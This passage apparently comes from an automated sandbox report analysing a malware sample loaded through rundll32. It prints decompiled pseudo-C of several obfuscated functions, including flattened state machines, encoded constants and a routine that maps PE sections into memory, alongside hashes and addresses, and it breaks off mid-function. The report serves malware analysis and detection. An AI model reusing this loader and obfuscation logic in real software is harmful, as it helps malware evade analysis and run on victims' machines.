                                                                                                                                  0x002f1696
                                                                                                                                  0x002f169c
                                                                                                                                  0x002f16b0
                                                                                                                                  0x002f16ba
                                                                                                                                  0x002f16c4
                                                                                                                                  0x002f16cc

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: !h$5M$d,
                                                                                                                                  • API String ID: 0-3324333736
                                                                                                                                  • Opcode ID: 31a7f9833dcd0b326e9f299eef76f1a004f3f3853abdcdc5a6d1f5c948d3c773
                                                                                                                                  • Instruction ID: a532782768437df187fe5db9a231fa229685ebf6426b4bed4466abbe122368ec
                                                                                                                                  • Opcode Fuzzy Hash: 31a7f9833dcd0b326e9f299eef76f1a004f3f3853abdcdc5a6d1f5c948d3c773
                                                                                                                                  • Instruction Fuzzy Hash: E191CEB141038C9BCF58DF65C98A9DE3FB1BB04358F509219FD2A96260D3B5C999CF84
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002EDEDC Relevance: 3.9, Strings: 3, Instructions: 162COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                  			E002EDEDC(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t132;
				signed int _t152;
				signed int _t154;
				signed int _t155;
				void* _t158;
				signed int* _t175;
				void* _t177;
				void* _t178;

				_push(_a16);
				_t174 = _a12;
				_t175 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002E20B9(_t132);
				_v68 = 0x4bd93;
				_t178 = _t177 + 0x18;
				_v68 = _v68 << 0xc;
				_v68 = _v68 ^ 0x4bd93000;
				_t158 = 0xc7349d4;
				_v72 = 0xdd086a;
				_v72 = _v72 + 0xe602;
				_v72 = _v72 ^ 0x00de9932;
				_v80 = 0x3b4fac;
				_v80 = _v80 | 0x3fbbffff;
				_v80 = _v80 ^ 0x3fb1db7a;
				_v84 = 0xeaa49b;
				_v84 = _v84 | 0xeaf55708;
				_v84 = _v84 ^ 0x8a8b7318;
				_v84 = _v84 ^ 0x607b886d;
				_v88 = 0x47a;
				_v88 = _v88 << 0x10;
				_v88 = _v88 << 7;
				_v88 = _v88 ^ 0x3d0d9eb4;
				_v92 = 0xf1af5e;
				_v92 = _v92 >> 0xc;
				_t154 = 0x35;
				_v92 = _v92 * 0x55;
				_v92 = _v92 ^ 0x000492d7;
				_v104 = 0x9f0b47;
				_v104 = _v104 + 0xffffc934;
				_v104 = _v104 ^ 0x723421f7;
				_v104 = _v104 | 0x7192d654;
				_v104 = _v104 ^ 0x73b08a7e;
				_v100 = 0x1207d9;
				_v100 = _v100 + 0x7e1b;
				_v100 = _v100 | 0x7b677906;
				_v100 = _v100 * 0xf;
				_v100 = _v100 ^ 0x3c0b4b50;
				_v60 = 0x5b441e;
				_v60 = _v60 ^ 0x5c22d9cd;
				_v60 = _v60 ^ 0x5c7ef938;
				_v64 = 0xefe367;
				_v64 = _v64 + 0x4581;
				_v64 = _v64 ^ 0x00f6697a;
				_v76 = 0x71c375;
				_t155 = 0x14;
				_v76 = _v76 / _t154;
				_v76 = _v76 + 0xaf56;
				_v76 = _v76 ^ 0x000ba048;
				_v48 = 0x1a9f92;
				_v48 = _v48 + 0x9d50;
				_v48 = _v48 ^ 0x001d37d0;
				_v52 = 0xf5c688;
				_v52 = _v52 + 0xffff5f34;
				_v52 = _v52 ^ 0x00ffa10c;
				_v56 = 0x3cec64;
				_v56 = _v56 ^ 0x003949c0;
				_v96 = 0x7057ec;
				_v96 = _v96 * 0x35;
				_v96 = _v96 | 0xca3e56e5;
				_v96 = _v96 / _t155;
				_v96 = _v96 ^ 0x0b2d80e0;
				do {
					while(_t158 != 0x254c3a7) {
						if(_t158 == 0x324cad4) {
							E002E0DAF(_v100,  &_v44, _v60,  *_t174, _v64, _v76);
							_t178 = _t178 + 0x10;
							_t158 = 0xd972b83;
							continue;
						} else {
							if(_t158 == 0xc7349d4) {
								_t158 = 0x254c3a7;
								 *_t175 =  *_t175 & 0x00000000;
								_t175[1] = _v68;
								continue;
							} else {
								if(_t158 == 0xd972b83) {
									E002F0E3A( &_v44, _v48, __eflags, _v52, _v56, _v96, _t174 + 4);
								} else {
									if(_t158 == 0xecd5bc1) {
										_push(_t158);
										_push(_t158);
										_t152 = E002D7FF2(_t175[1]);
										 *_t175 = _t152;
										__eflags = _t152;
										if(__eflags != 0) {
											_t158 = 0xfbc7198;
											continue;
										}
									} else {
										if(_t158 != 0xfbc7198) {
											goto L13;
										} else {
											E002D3DBC( &_v44, _t175, _v88, _v92, _v104);
											_t178 = _t178 + 0xc;
											_t158 = 0x324cad4;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t175;
						_t131 =  *_t175 != 0;
						__eflags = _t131;
						return 0 | _t131;
					}
					_t175[1] = E002EAC3A(_t174);
					_t158 = 0xecd5bc1;
					L13:
					__eflags = _t158 - 0x72dd7bf;
				} while (__eflags != 0);
				goto L16;
			}



























                                                                                                                                  0x002edee3
                                                                                                                                  0x002edeea
                                                                                                                                  0x002edef1
                                                                                                                                  0x002edef3
                                                                                                                                  0x002edef4
                                                                                                                                  0x002edefb
                                                                                                                                  0x002edf02
                                                                                                                                  0x002edf03
                                                                                                                                  0x002edf04
                                                                                                                                  0x002edf09
                                                                                                                                  0x002edf11
                                                                                                                                  0x002edf14
                                                                                                                                  0x002edf1b
                                                                                                                                  0x002edf23
                                                                                                                                  0x002edf28
                                                                                                                                  0x002edf30
                                                                                                                                  0x002edf38
                                                                                                                                  0x002edf40
                                                                                                                                  0x002edf48
                                                                                                                                  0x002edf50
                                                                                                                                  0x002edf58
                                                                                                                                  0x002edf60
                                                                                                                                  0x002edf68
                                                                                                                                  0x002edf70
                                                                                                                                  0x002edf78
                                                                                                                                  0x002edf80
                                                                                                                                  0x002edf85
                                                                                                                                  0x002edf8a
                                                                                                                                  0x002edf92
                                                                                                                                  0x002edf9a
                                                                                                                                  0x002edfa6
                                                                                                                                  0x002edfa9
                                                                                                                                  0x002edfad
                                                                                                                                  0x002edfb5
                                                                                                                                  0x002edfbd
                                                                                                                                  0x002edfc5
                                                                                                                                  0x002edfcd
                                                                                                                                  0x002edfd5
                                                                                                                                  0x002edfdd
                                                                                                                                  0x002edfe5
                                                                                                                                  0x002edfed
                                                                                                                                  0x002edffa
                                                                                                                                  0x002edffe
                                                                                                                                  0x002ee006
                                                                                                                                  0x002ee00e
                                                                                                                                  0x002ee016
                                                                                                                                  0x002ee01e
                                                                                                                                  0x002ee026
                                                                                                                                  0x002ee02e
                                                                                                                                  0x002ee036
                                                                                                                                  0x002ee044
                                                                                                                                  0x002ee045
                                                                                                                                  0x002ee049
                                                                                                                                  0x002ee051
                                                                                                                                  0x002ee059
                                                                                                                                  0x002ee061
                                                                                                                                  0x002ee069
                                                                                                                                  0x002ee071
                                                                                                                                  0x002ee079
                                                                                                                                  0x002ee081
                                                                                                                                  0x002ee089
                                                                                                                                  0x002ee099
                                                                                                                                  0x002ee0a1
                                                                                                                                  0x002ee0ae
                                                                                                                                  0x002ee0b2
                                                                                                                                  0x002ee0cc
                                                                                                                                  0x002ee0d0
                                                                                                                                  0x002ee0d8
                                                                                                                                  0x002ee0d8
                                                                                                                                  0x002ee0e6
                                                                                                                                  0x002ee176
                                                                                                                                  0x002ee17b
                                                                                                                                  0x002ee17e
                                                                                                                                  0x00000000
                                                                                                                                  0x002ee0e8
                                                                                                                                  0x002ee0ee
                                                                                                                                  0x002ee153
                                                                                                                                  0x002ee155
                                                                                                                                  0x002ee158
                                                                                                                                  0x00000000
                                                                                                                                  0x002ee0f0
                                                                                                                                  0x002ee0f6
                                                                                                                                  0x002ee1bd
                                                                                                                                  0x002ee0fc
                                                                                                                                  0x002ee102
                                                                                                                                  0x002ee13c
                                                                                                                                  0x002ee13d
                                                                                                                                  0x002ee13e
                                                                                                                                  0x002ee143
                                                                                                                                  0x002ee147
                                                                                                                                  0x002ee149
                                                                                                                                  0x002ee14b
                                                                                                                                  0x00000000
                                                                                                                                  0x002ee14b
                                                                                                                                  0x002ee104
                                                                                                                                  0x002ee106
                                                                                                                                  0x00000000
                                                                                                                                  0x002ee10c
                                                                                                                                  0x002ee11e
                                                                                                                                  0x002ee123
                                                                                                                                  0x002ee126
                                                                                                                                  0x00000000
                                                                                                                                  0x002ee126
                                                                                                                                  0x002ee106
                                                                                                                                  0x002ee102
                                                                                                                                  0x002ee0f6
                                                                                                                                  0x002ee0ee
                                                                                                                                  0x002ee1c5
                                                                                                                                  0x002ee1c7
                                                                                                                                  0x002ee1cc
                                                                                                                                  0x002ee1cc
                                                                                                                                  0x002ee1d3
                                                                                                                                  0x002ee1d3
                                                                                                                                  0x002ee18f
                                                                                                                                  0x002ee192
                                                                                                                                  0x002ee197
                                                                                                                                  0x002ee197
                                                                                                                                  0x002ee197
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: d<$g$Wp
                                                                                                                                  • API String ID: 0-355099142
                                                                                                                                  • Opcode ID: 6b2c2b6d1b47deee33f6011a26382e9fad0b3e922fbca3b1d898976e6b354319
                                                                                                                                  • Instruction ID: 88cabe84e94a0c8ad428d740633360418bc8caea52b8cdf9498ab886fc2a74ce
                                                                                                                                  • Opcode Fuzzy Hash: 6b2c2b6d1b47deee33f6011a26382e9fad0b3e922fbca3b1d898976e6b354319
                                                                                                                                  • Instruction Fuzzy Hash: C37132B10193419FC768CF61C48942FBBF1FBC9748F50891DF29A96220D3B69A59CF46
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002EC3A0 Relevance: 3.9, Strings: 3, Instructions: 150COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                  			E002EC3A0(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* _t137;
				void* _t149;
				void* _t159;
				void* _t161;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				void* _t188;
				void* _t193;
				intOrPtr* _t195;
				signed int* _t197;
				signed int* _t198;
				signed int* _t199;

				_push(_a16);
				_t195 = __ecx;
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002E20B9(_t137);
				_v4 = _v4 & 0x00000000;
				_v12 = 0x8437e8;
				_v8 = 0xdb9720;
				_v60 = 0xf5e956;
				_v60 = _v60 << 0xc;
				_t163 = 0x6b;
				_v60 = _v60 / _t163;
				_v60 = _v60 | 0x488cc8ef;
				_v60 = _v60 ^ 0x48eedbff;
				_v44 = 0x82c5a5;
				_v44 = _v44 | 0x04b6a6f1;
				_t164 = 0x4a;
				_v44 = _v44 * 0x6a;
				_v44 = _v44 ^ 0xf3bc2b72;
				_v40 = 0x882fad;
				_v40 = _v40 ^ 0x709d76bd;
				_v40 = _v40 + 0xffff52d2;
				_v40 = _v40 ^ 0x7014aba2;
				_v28 = 0x22e756;
				_v28 = _v28 + 0x769a;
				_v28 = _v28 ^ 0x002bcc4a;
				_v64 = 0xc290d0;
				_v64 = _v64 + 0xffff641a;
				_v64 = _v64 << 0xd;
				_v64 = _v64 ^ 0xbd78a131;
				_v64 = _v64 ^ 0x83ed8c94;
				_v32 = 0x78b1b0;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0x2c621b2d;
				_v36 = 0xa1b61f;
				_v36 = _v36 + 0xb017;
				_v36 = _v36 | 0xc1836c3e;
				_v36 = _v36 ^ 0xc1a0ee75;
				_v56 = 0x2861cb;
				_v56 = _v56 / _t164;
				_v56 = _v56 << 0xd;
				_t165 = 0x1b;
				_v56 = _v56 / _t165;
				_v56 = _v56 ^ 0x00aa9f16;
				_v24 = 0x4a8582;
				_v24 = _v24 | 0x39704e96;
				_v24 = _v24 ^ 0x397cf0ca;
				_v52 = 0x9fdf3f;
				_v52 = _v52 | 0x733ecb9c;
				_v52 = _v52 >> 0x10;
				_t166 = 0x2c;
				_v52 = _v52 / _t166;
				_v52 = _v52 ^ 0x0002453b;
				_v20 = 0x70cd9;
				_v20 = _v20 ^ 0x0384d77a;
				_v20 = _v20 ^ 0x03811849;
				_v16 = 0x6ca56e;
				_v16 = _v16 * 0x1c;
				_v16 = _v16 ^ 0x0be055d0;
				_v48 = 0x383b50;
				_v48 = _v48 + 0xe78c;
				_v48 = _v48 + 0x7960;
				_v48 = _v48 + 0xffff251b;
				_v48 = _v48 ^ 0x003eca00;
				_t167 = _v28;
				_t149 = E002D474F(_t167, __ecx, _v64, _v32);
				_t159 = _t149;
				_t197 =  &(( &_v64)[8]);
				if(_t159 != 0) {
					_push(_t167);
					_t188 = E002DA3A3( *((intOrPtr*)(_t159 + 0x50)), _v36, _v56, _v24, _v40, _v44 | _v60);
					_t198 =  &(_t197[5]);
					if(_t188 == 0) {
						L6:
						return _t188;
					}
					E002DED7E(_v52, _t188, _v20,  *__ecx,  *((intOrPtr*)(_t159 + 0x54)));
					_t199 =  &(_t198[3]);
					_t193 = ( *(_t159 + 0x14) & 0x0000ffff) + 0x18 + _t159;
					_t161 = ( *(_t159 + 6) & 0x0000ffff) * 0x28 + _t193;
					while(_t193 < _t161) {
						_t157 =  <  ?  *((void*)(_t193 + 8)) :  *((intOrPtr*)(_t193 + 0x10));
						E002DED7E(_v16,  *((intOrPtr*)(_t193 + 0xc)) + _t188, _v48,  *((intOrPtr*)(_t193 + 0x14)) +  *_t195,  <  ?  *((void*)(_t193 + 8)) :  *((intOrPtr*)(_t193 + 0x10)));
						_t199 =  &(_t199[3]);
						_t193 = _t193 + 0x28;
					}
					goto L6;
				}
				return _t149;
			}


































                                                                                                                                  0x002ec3a5
                                                                                                                                  0x002ec3a9
                                                                                                                                  0x002ec3ab
                                                                                                                                  0x002ec3ad
                                                                                                                                  0x002ec3b1
                                                                                                                                  0x002ec3b5
                                                                                                                                  0x002ec3b6
                                                                                                                                  0x002ec3b7
                                                                                                                                  0x002ec3bc
                                                                                                                                  0x002ec3c3
                                                                                                                                  0x002ec3cb
                                                                                                                                  0x002ec3d3
                                                                                                                                  0x002ec3db
                                                                                                                                  0x002ec3e6
                                                                                                                                  0x002ec3eb
                                                                                                                                  0x002ec3f1
                                                                                                                                  0x002ec3f9
                                                                                                                                  0x002ec401
                                                                                                                                  0x002ec409
                                                                                                                                  0x002ec416
                                                                                                                                  0x002ec419
                                                                                                                                  0x002ec41d
                                                                                                                                  0x002ec425
                                                                                                                                  0x002ec42d
                                                                                                                                  0x002ec435
                                                                                                                                  0x002ec43d
                                                                                                                                  0x002ec445
                                                                                                                                  0x002ec44d
                                                                                                                                  0x002ec455
                                                                                                                                  0x002ec45d
                                                                                                                                  0x002ec465
                                                                                                                                  0x002ec46d
                                                                                                                                  0x002ec472
                                                                                                                                  0x002ec47a
                                                                                                                                  0x002ec482
                                                                                                                                  0x002ec48a
                                                                                                                                  0x002ec48f
                                                                                                                                  0x002ec497
                                                                                                                                  0x002ec49f
                                                                                                                                  0x002ec4a7
                                                                                                                                  0x002ec4af
                                                                                                                                  0x002ec4b7
                                                                                                                                  0x002ec4c7
                                                                                                                                  0x002ec4cb
                                                                                                                                  0x002ec4d4
                                                                                                                                  0x002ec4d9
                                                                                                                                  0x002ec4df
                                                                                                                                  0x002ec4e7
                                                                                                                                  0x002ec4ef
                                                                                                                                  0x002ec4f7
                                                                                                                                  0x002ec4ff
                                                                                                                                  0x002ec507
                                                                                                                                  0x002ec50f
                                                                                                                                  0x002ec518
                                                                                                                                  0x002ec51b
                                                                                                                                  0x002ec51f
                                                                                                                                  0x002ec527
                                                                                                                                  0x002ec52f
                                                                                                                                  0x002ec537
                                                                                                                                  0x002ec53f
                                                                                                                                  0x002ec54c
                                                                                                                                  0x002ec550
                                                                                                                                  0x002ec55a
                                                                                                                                  0x002ec562
                                                                                                                                  0x002ec56a
                                                                                                                                  0x002ec572
                                                                                                                                  0x002ec57a
                                                                                                                                  0x002ec58a
                                                                                                                                  0x002ec58e
                                                                                                                                  0x002ec593
                                                                                                                                  0x002ec595
                                                                                                                                  0x002ec59a
                                                                                                                                  0x002ec5a9
                                                                                                                                  0x002ec5c3
                                                                                                                                  0x002ec5c5
                                                                                                                                  0x002ec5ca
                                                                                                                                  0x002ec628
                                                                                                                                  0x00000000
                                                                                                                                  0x002ec62a
                                                                                                                                  0x002ec5dd
                                                                                                                                  0x002ec5e6
                                                                                                                                  0x002ec5f0
                                                                                                                                  0x002ec5f5
                                                                                                                                  0x002ec623
                                                                                                                                  0x002ec60a
                                                                                                                                  0x002ec618
                                                                                                                                  0x002ec61d
                                                                                                                                  0x002ec620
                                                                                                                                  0x002ec620
                                                                                                                                  0x00000000
                                                                                                                                  0x002ec627
                                                                                                                                  0x002ec630

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: P;8$V"$`y
                                                                                                                                  • API String ID: 0-4109183828
                                                                                                                                  • Opcode ID: da3d3e966c2bfd9a43e683d3757623c06ebfc3864563e683fe95cfd531e9bb60
                                                                                                                                  • Instruction ID: ce0dd2b69099df2f1e4252663a7f8d8f84576fc025a85f92a6b5cbb4ee475e2b
                                                                                                                                  • Opcode Fuzzy Hash: da3d3e966c2bfd9a43e683d3757623c06ebfc3864563e683fe95cfd531e9bb60
                                                                                                                                  • Instruction Fuzzy Hash: 856155715183409FC354CF66C88991BBBF2FBC8718F508A1CF69A96260D7B2D919CF06
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002D1A56 Relevance: 3.9, Strings: 3, Instructions: 115COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                  			E002D1A56(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t86;
				void* _t100;
				void* _t101;
				void* _t103;
				void* _t115;
				void* _t116;
				signed int _t117;
				void* _t119;
				void* _t120;

				_push(_a8);
				_t115 = __edx;
				_t101 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002E20B9(_t86);
				_v72 = 0xccde8a;
				_t120 = _t119 + 0x10;
				_v72 = _v72 | 0xfb673ead;
				_v72 = _v72 + 0xedb6;
				_t116 = 0;
				_v72 = _v72 + 0xffff76c0;
				_t103 = 0x3303944;
				_v72 = _v72 ^ 0xfbf43e98;
				_v48 = 0xd56f6c;
				_v48 = _v48 ^ 0x96c3cc23;
				_v48 = _v48 ^ 0x96174539;
				_v76 = 0xdcf6fd;
				_v76 = _v76 + 0xffffee01;
				_t117 = 0x65;
				_v76 = _v76 * 0x23;
				_v76 = _v76 + 0xffff4e11;
				_v76 = _v76 ^ 0x1e3c7761;
				_v80 = 0x144f78;
				_v80 = _v80 * 0x39;
				_v80 = _v80 ^ 0xe273dc44;
				_v80 = _v80 >> 5;
				_v80 = _v80 ^ 0x073b5be1;
				_v52 = 0xb4a3bb;
				_v52 = _v52 ^ 0x916b14c7;
				_v52 = _v52 ^ 0x91dd676b;
				_v68 = 0x8d73f0;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 * 0x1c;
				_v68 = _v68 ^ 0x0000c864;
				_v56 = 0xe6cb06;
				_v56 = _v56 >> 4;
				_v56 = _v56 | 0x1af2f565;
				_v56 = _v56 ^ 0x1af384df;
				_v60 = 0x4f2325;
				_t55 =  &_v60; // 0x4f2325
				_v60 =  *_t55 * 0x78;
				_t57 =  &_v60; // 0x4f2325
				_v60 =  *_t57 / _t117;
				_v60 = _v60 ^ 0x0059a097;
				_v64 = 0xa290a2;
				_v64 = _v64 >> 4;
				_v64 = _v64 + 0x6f89;
				_v64 = _v64 ^ 0x00044b6b;
				while(_t103 != 0x3303944) {
					if(_t103 == 0x5a97fa2) {
						__eflags = E002ED97D( &_v44, _v56, __eflags, _v60, _t115 + 0x30, _v64);
						_t116 =  !=  ? 1 : _t116;
					} else {
						if(_t103 == 0xa5a4144) {
							E002D3DBC( &_v44, _t101, _v72, _v48, _v76);
							_t120 = _t120 + 0xc;
							_t103 = 0xf0cd209;
							continue;
						} else {
							if(_t103 != 0xf0cd209) {
								L9:
								__eflags = _t103 - 0x1b06c67;
								if(__eflags != 0) {
									continue;
								} else {
								}
							} else {
								_t100 = E002D2A21(_v80, _v52,  &_v44, _t115 + 0x38, _v68);
								_t120 = _t120 + 0xc;
								if(_t100 != 0) {
									_t103 = 0x5a97fa2;
									continue;
								}
							}
						}
					}
					return _t116;
				}
				_t103 = 0xa5a4144;
				goto L9;
			}






















                                                                                                                                  0x002d1a5d
                                                                                                                                  0x002d1a61
                                                                                                                                  0x002d1a63
                                                                                                                                  0x002d1a65
                                                                                                                                  0x002d1a69
                                                                                                                                  0x002d1a6a
                                                                                                                                  0x002d1a6b
                                                                                                                                  0x002d1a70
                                                                                                                                  0x002d1a78
                                                                                                                                  0x002d1a7b
                                                                                                                                  0x002d1a85
                                                                                                                                  0x002d1a8d
                                                                                                                                  0x002d1a8f
                                                                                                                                  0x002d1a97
                                                                                                                                  0x002d1a9c
                                                                                                                                  0x002d1aa4
                                                                                                                                  0x002d1aac
                                                                                                                                  0x002d1ab4
                                                                                                                                  0x002d1abc
                                                                                                                                  0x002d1ac4
                                                                                                                                  0x002d1ad3
                                                                                                                                  0x002d1ad4
                                                                                                                                  0x002d1ad8
                                                                                                                                  0x002d1ae0
                                                                                                                                  0x002d1ae8
                                                                                                                                  0x002d1af5
                                                                                                                                  0x002d1af9
                                                                                                                                  0x002d1b01
                                                                                                                                  0x002d1b06
                                                                                                                                  0x002d1b0e
                                                                                                                                  0x002d1b16
                                                                                                                                  0x002d1b1e
                                                                                                                                  0x002d1b26
                                                                                                                                  0x002d1b2e
                                                                                                                                  0x002d1b38
                                                                                                                                  0x002d1b3c
                                                                                                                                  0x002d1b44
                                                                                                                                  0x002d1b4c
                                                                                                                                  0x002d1b51
                                                                                                                                  0x002d1b59
                                                                                                                                  0x002d1b61
                                                                                                                                  0x002d1b69
                                                                                                                                  0x002d1b6e
                                                                                                                                  0x002d1b72
                                                                                                                                  0x002d1b7d
                                                                                                                                  0x002d1b81
                                                                                                                                  0x002d1b89
                                                                                                                                  0x002d1b91
                                                                                                                                  0x002d1b96
                                                                                                                                  0x002d1b9e
                                                                                                                                  0x002d1ba6
                                                                                                                                  0x002d1bb0
                                                                                                                                  0x002d1c36
                                                                                                                                  0x002d1c38
                                                                                                                                  0x002d1bb2
                                                                                                                                  0x002d1bb8
                                                                                                                                  0x002d1bf9
                                                                                                                                  0x002d1bfe
                                                                                                                                  0x002d1c01
                                                                                                                                  0x00000000
                                                                                                                                  0x002d1bba
                                                                                                                                  0x002d1bc0
                                                                                                                                  0x002d1c0d
                                                                                                                                  0x002d1c0d
                                                                                                                                  0x002d1c13
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d1c15
                                                                                                                                  0x002d1bc2
                                                                                                                                  0x002d1bd7
                                                                                                                                  0x002d1bdc
                                                                                                                                  0x002d1be1
                                                                                                                                  0x002d1be3
                                                                                                                                  0x00000000
                                                                                                                                  0x002d1be3
                                                                                                                                  0x002d1be1
                                                                                                                                  0x002d1bc0
                                                                                                                                  0x002d1bb8
                                                                                                                                  0x002d1c44
                                                                                                                                  0x002d1c44
                                                                                                                                  0x002d1c08
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %#O$DAZ$DAZ
                                                                                                                                  • API String ID: 0-2081751441
                                                                                                                                  • Opcode ID: 735cac04c0b91fcafe53dd54d1087b531fb08a74cbfbbe1956c72258fa92def8
                                                                                                                                  • Instruction ID: d43e6627cdb050d51b123e16b5749ee6621dba6e2cd6d29be382f6defc2df574
                                                                                                                                  • Opcode Fuzzy Hash: 735cac04c0b91fcafe53dd54d1087b531fb08a74cbfbbe1956c72258fa92def8
                                                                                                                                  • Instruction Fuzzy Hash: BF515671518302AFC758CF25D98581BBBE1FBD8708F500A2EF586A2660D375CA298F87
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002F0C14 Relevance: 3.9, Strings: 3, Instructions: 113COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E002F0C14(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _t111;
				void* _t115;
				void* _t116;
				signed int _t118;
				void* _t124;
				void* _t125;
				signed int* _t127;

				_t127 =  &_v44;
				_t116 = __ecx;
				_v24 = 0x2b1199;
				_v24 = _v24 + 0x4ba2;
				_v24 = _v24 << 0xa;
				_v24 = _v24 ^ 0xad737bf1;
				_v44 = 0xc9a4fe;
				_v44 = _v44 << 0xe;
				_v44 = _v44 | 0xe69540e1;
				_v44 = _v44 + 0xffffff88;
				_v44 = _v44 ^ 0xefbb2da7;
				_v28 = 0xedc73;
				_v28 = _v28 + 0xffff2701;
				_v28 = _v28 + 0x8bbf;
				_v28 = _v28 ^ 0x00055e2c;
				_v16 = 0xf95115;
				_v16 = _v16 | 0x79ce56df;
				_v16 = _v16 + 0xffff5817;
				_v16 = _v16 ^ 0x79f40a5c;
				_v36 = 0x520750;
				_v36 = _v36 << 7;
				_v36 = _v36 ^ 0x4f263ebd;
				_v36 = _v36 * 6;
				_v36 = _v36 ^ 0x64ef8369;
				_t124 = 0;
				_v40 = 0xccfebc;
				_t125 = 0x2aa38ff;
				_v40 = _v40 + 0xbaf7;
				_t118 = 0xd;
				_v40 = _v40 * 0x5e;
				_v40 = _v40 + 0x6a66;
				_v40 = _v40 ^ 0x4b80704d;
				_v20 = 0xba2b89;
				_v20 = _v20 + 0xa093;
				_v20 = _v20 / _t118;
				_v20 = _v20 ^ 0x000a03fd;
				_v32 = 0xb0f3b0;
				_v32 = _v32 + 0x50dc;
				_v32 = _v32 + 0xffff1629;
				_v32 = _v32 * 0x4e;
				_v32 = _v32 ^ 0x35b73aee;
				_v4 = 0x432383;
				_v4 = _v4 + 0xffff373f;
				_v4 = _v4 | 0x7532efd9;
				_v4 = _v4 ^ 0x75785e39;
				_v8 = 0x709bec;
				_v8 = _v8 + 0xffffb2bc;
				_v8 = _v8 + 0xffff08e7;
